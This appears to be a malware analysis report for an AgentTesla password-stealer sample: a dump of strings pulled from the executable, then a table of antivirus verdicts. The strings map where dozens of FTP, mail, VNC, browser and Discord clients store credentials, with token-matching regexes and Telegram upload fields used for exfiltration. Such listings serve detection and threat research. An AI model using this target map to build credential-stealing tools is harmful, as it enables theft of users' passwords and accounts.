.*"password":"(.*?)"
privateinternetaccess.com
%ProgramW6432%
Private Internet Access\data
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
Sites.dat
\FlashFXP\
quick.dat
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
SystemDrive
\FTP Navigator\Ftplist.txt
Server
No Password
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
;User=
;Anonymous=
;Port=
;Password=
\Program Files (x86)\FTP Commander\Ftplist.txt
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\cftp\Ftplist.txt
;Server=
FTPGetter
<server>
\FTPGetter\servers.xml
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
COMPlus_legacyCorruptedStateExceptionsPolicy
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
eM Client\accounts.dat
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
o6806642kbM7c5
Mailbird
SenderIdentities
\Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
TightVNC
Software\TightVNC\Server
PasswordViewOnly
RealVNC 3.x
Software\ORL\WinVNC3
RealVNC 4.x
SOFTWARE\RealVNC\WinVNC4
TigerVNC
Software\TigerVNC\Server
SOFTWARE\RealVNC\vncserver
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
TightVNC ControlPassword
ControlPassword
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
discordptb
discordcanary
Local Storage\leveldb
origin_url
username_value
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Login Data
\Default\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
[^\u0020-\u007F]
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Username:
Application:
Host:
Password:
<br><hr>
<br>Password:
<br>Application:
<br>Username:
Torch Browser
Torch\User Data
Orbitum
Orbitum\User Data
CentBrowser
CentBrowser\User Data
Chromium
Chromium\User Data
Epic Privacy
Epic Privacy Browser\User Data
Iridium Browser
Iridium\User Data
SeaMonkey
\Mozilla\SeaMonkey\
WaterFox
\Waterfox\
Citrio
CatalinaGroup\Citrio\User Data
K-Meleon
\K-Meleon\
Cool Novo
MapleStudio\ChromePlus\User Data
QIP Surf
QIP Surf\User Data
Coowon
Coowon\Coowon\User Data
Sputnik
Sputnik\Sputnik\User Data
BraveSoftware\Brave-Browser\User Data
Chedot
Chedot\User Data
IceDragon
\Comodo\IceDragon\
Yandex Browser
Yandex\YandexBrowser\User Data
Kometa
Kometa\User Data
BlackHawk
\NETGATE Technologies\BlackHawk\
Coccoc
CocCoc\Browser\User Data
360 Browser
360Chrome\Chrome\User Data
IceCat
\Mozilla\icecat\
Elements Browser
Elements Browser\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Liebao Browser
liebao\User Data
7Star\7Star\User Data
CyberFox
\8pecxstudios\Cyberfox\
Vivaldi
Vivaldi\User Data
Postbox
\Postbox\
uCozMedia\Uran\User Data
Firefox
\Mozilla\Firefox\
PaleMoon
\Moonchild Productions\Pale Moon\
Comodo Dragon
Comodo\Dragon\User Data
Opera Browser
Opera Software\Opera Stable
Edge Chromium
Microsoft\Edge\User Data
Chrome
Google\Chrome\User Data
Amigo\User Data
Thunderbird
\Thunderbird\
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
OBJECTIDENTIFIER
{0:X2}
INTEGER
OCTETSTRING
SEQUENCE {
Windows Credential
chrome
policy
{{{0}}}
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
13ad36db-4b9e-4166-a0ab-36d27af77e03
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
f349be6d-68ab-4996-a9da-199a80a37ab4
Win32_BaseBoard
SerialNumber
0ac9f9db-0935-418e-b53e-48182f1b9395
chat_id
caption
yyyy-MM-dd HH-mm-ss
text/plain
sendDocument
document
---------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}"
Content-Disposition: form-data; name="{0}"; filename="{1}"
Content-Type: {2}
Version: 0x{0:X}
StorageSize: {0} (0x{0:X})
FormatID: {0}
Version is not equal to {0} ({1})
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Size of the SerializedPropertyStore is less than {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
Value: {0}
Type: {0}
Name: {0}
NameSize: {0} (0x{0:X})
ValueSize: {0} (0x{0:X})
Size of the StringName is not equal to {0} ({1})
Size of the StringName is less than 9 ({0})
Size of the NameSize is not equal to {0} ({1})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins
sha512
credential
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
7f774f41-d19b-45d0-93bb-bcea6f138241.exe
LegalCopyright
OriginalFilename
7f774f41-d19b-45d0-93bb-bcea6f138241.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0

Antivirus Signature

Bkav Clean
Lionic Trojan.Win32.Agensla.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Generic.MSIL.PasswordStealerA.DD912EF1
ClamAV Win.Packed.Msilperseus-9956591-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Generic.dt
McAfee Artemis!66D2A9CCB1C8
Cylance unsafe
VIPRE Generic.MSIL.PasswordStealerA.DD912EF1
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Generic.MSIL.PasswordStealerA.DD912EF1
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/Spy.AgentTesla.F
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.MSIL.Agensla.a
Alibaba TrojanPSW:MSIL/AgentTesla.3105da4c
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Agent.240640.DR
Rising Spyware.AgentTesla!8.10E35 (CLOUD)
Sophos Troj/Tesla-CNT
F-Secure Clean
DrWeb BackDoor.SpyBotNET.73
Zillya Clean
TrendMicro TROJ_GEN.R014C0DJ623
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.66d2a9ccb1c8fc3c
Emsisoft Generic.MSIL.PasswordStealerA.DD912EF1 (B)
Ikarus Trojan-Spy.MSIL.AgentTesla
GData Generic.MSIL.PasswordStealerA.DD912EF1
Jiangmin Clean
Webroot Clean
Google Detected
Avira Clean
MAX malware (ai score=89)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Ransom.Win32.AzorUlt.sa
Xcitium Clean
Arcabit Generic.MSIL.PasswordStealerA.DD912EF1
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-PSW.MSIL.Agensla.a
Microsoft Trojan:MSIL/AgentTesla.PSYL!MTB
Varist W32/Azorult.D.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.C5498285
Acronis Clean
VBA32 Trojan.MSIL.InfoStealer.gen.D
ALYac Generic.MSIL.PasswordStealerA.DD912EF1
TACHYON Clean
DeepInstinct MALICIOUS
Malwarebytes Spyware.AgentTesla.Generic
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R014C0DJ623
Tencent Malware.Win32.Gencirc.13f15ac5
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.F!tr.spy
BitDefenderTheta Gen:NN.ZemsilF.36738.om0@a0uhfpj
AVG Win32:PWSX-gen [Trj]
Cybereason malicious.a84056
Avast Win32:PWSX-gen [Trj]
No IRMA results available.